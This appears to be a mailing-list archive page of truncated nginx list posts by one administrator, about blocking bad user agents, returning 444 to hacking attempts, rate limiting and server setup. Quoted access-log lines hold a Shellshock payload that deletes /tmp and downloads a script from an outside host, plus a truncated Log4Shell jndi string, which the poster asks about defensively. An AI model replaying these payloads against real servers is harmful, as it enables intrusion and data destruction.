I have a map to check for bad user agents called badagent. I want to
set up a RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type.
This is rejected.
if (($request_uri != [*.xml]) && ($badagent)) {return 444; }
Suggestions?
Stripping down the nginx.conf file:
server{
location / {
root /usr/share/nginx/html/mydomain/public_html;
if ($badagent) { return 403; }
}
location = /feeds {
try_files $uri $uri.xml $uri/ ;
}
}
The "=" should force an exact match, but the badagent map is checked.
___
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly wrote:
> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > Stripping down the nginx.conf file:
> >
> > server{
> > location / {
> > root /usr/share/nginx
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly wrote:
> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > location / {
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
>
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad" wrote:
> Hi all,
>
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
>
> The more I look into this the more I'm convinced this is an issue
>
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad" wrote:
> Thanks for that info. It's definitely harder to notice the issue on
> small servers like that. But you are still seeing about a 50%
> increase in ram usage there by your own tests.
>
> The smallest server I've tested this on uses about 20M d
Answers intermixed below.
On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena" wrote:
> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
>
>
> Hello @garic,
> thanks for this
I insist on encryption so this is what I use:
server {
listen 80;
server_name yourdomain.com www.yourdomain.com ;
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
return 301 https://$host$request_uri;
}
I only serve static pages so I use
I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706
"${${lower:jndi}:${lower:rm
> interpolate these, and thus be vulnerable to the exploit.
>
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
> wrote:
>
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. Howerver I am confused why a returned a 20
On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_" wrote:
> server
> {
>listen 443 default_server ssl;
>listen [::]:443 ssl http2;
>server_name dummysite.io www.dummysite.io;
>ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>ssl_certifica
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" wrote:
> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they
> show up with a return code of 400 (malformed). Wel
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" wrote:
> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" wrote:
> >
> > > On Friday 29 July 2016 23:01:0
Nginx 1.10.1,2
FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016
I'm using the "map" module to detect obvious hacking by detecting
keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is
easy. I give them a 444 return code with the idea being I can run a
script on the log
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0
On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis" wrote:
> > Configuration file included in the post. I already checked it.
>
> You have shown only few excerpts (like there might be other
> access_log directives
should try to duplicate this in the event it has something
to do with my setup.
On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:
> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.
200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"
"Mozilla/5.
http://pastebin.com/tZZg3RbA/?e=1
This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.
I replaced the domain with a fake
http://pastebin.com/7W0uDrLa
If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my doman name.
I have a "map" that detects typical hacker activity. Perhaps in m
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012" wrote:
> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
>
> Stick to common sense with your config, lock down nginx and the
> backends, define proper flood and overf
I only serve static pages, hence I have this in my conf file:
---
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
Shouldn't the return code be 444 instead of 400?
--
I keep my nginx server set up dumb. (Don't need anything fancy at the
moment). Is this request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe IOS makes some requests that
some websites will process, and others would just ignore after the
question mark.
444
A bit OT, but can a guru verify I rejected all these proxy attempts.
I'm 99.9% sure, but I'd hate to allow some spammer or worse to route
through my server. The only edit I made is when they ran my IP address
though a forum spam checker. (I assume google indexes pastebin.)
https://pastebin.com/VCg
Here is the map. I truncated my bad agent list, but will get you
started. I used the user agent changer in Chromium to make sure it
worked. -
map $http_user_agent $badagent {
default0;
~*WordPress
I would like to block the google app from directly downloading images.
access.log:
200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg
HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
My nginx code in the images location:
if ($http_referer
format.
On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki wrote:
> Do you mean $http_user_agent?
>
> > On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> > wrote:
> >
> > I would like to block the google app from directly downloading
> &g
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.
On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:
> I want to block by referrer. I provided a more &quo
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.
This code in the image location section will block the google app:
if ($http_user_agent ~* (com.google.GoogleMobi
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly wrote:
> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
>
> Hi there,
>
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t
>
> If you were running this command as "root", would that prompt say
> "root@neb" and end with a
I'm curious why this request got a 400 response rather than a 404.
400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm
HTTP/1.1" 173 "-" "-" "-"
log_format main '$status $remote_addr - $remote_user [$time_local] "$request"
'
'$body_bytes_sent "
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company
security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40
86.184.152.14 58714 -> myip 80,
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error log. That said, I have file permission problem.
nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UT
ziz Rozyev wrote:
> Hi,
>
> have you checked this with disabled selinux ?
>
> br,
> Aziz.
>
>
>
>
>
> > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote:
> >
> > I'm setting up a web server on a Centos 7 VPS. I'm rela
Presently I'm putting maps in the server location. Can they be put in
the very top to make them work for all servers? If not, I can just make
the maps into include files and insert as needed, but maybe making the
map global is more efficient.
___
nginx m
When I was using FreeBSD, the access log was real time. Since I went to
Centos, that doesn't seem to be the case. Is there some way to flush
the buffer?
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
On Thu, 22 Feb 2018 18:40:12 -0800
"li...@lazygranch.com" wrote:
> When I was using FreeBSD, the access log was real time. Since I went
> to Centos, that doesn't seem to be the case. Is there some way to
> flush the buffer?
> _
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" wrote:
> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" wrote:
>
> > When I was using FreeBSD, the access log was real time. Since I went
> > to Centos, that doesn't seem to b
I can't get the add_before_body feature to work. I have verified the
module is installed.
Here is what I am trying to accomplish. I want to add the following
lines to the header of every html file:
--
This is supposed
I had a few neurons fire. I forgot nginx can load dynamic modules.
https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/
I haven't done this myself, so you are on your own at this point.
On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv" wrote:
> I've resigned myself to the fact that th
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael" wrote:
> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I start, I thought I’d ask to se
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael" wrote:
> This is great, thank you again, this is a huge jumpstart!
Per NIST best practices, you should limit the HTML verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you 444 websites trying to POST for ex
The centos nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without compilation.
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7
Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make the updates go
I am presently using a scheme like this to prevent scraping documents.
location /images/ {
valid_referers none blocked www.example.com example.com
forums.othersite.com ;
# you can tell the browser that it can only download content from the domain
44 matches
Mail list logo
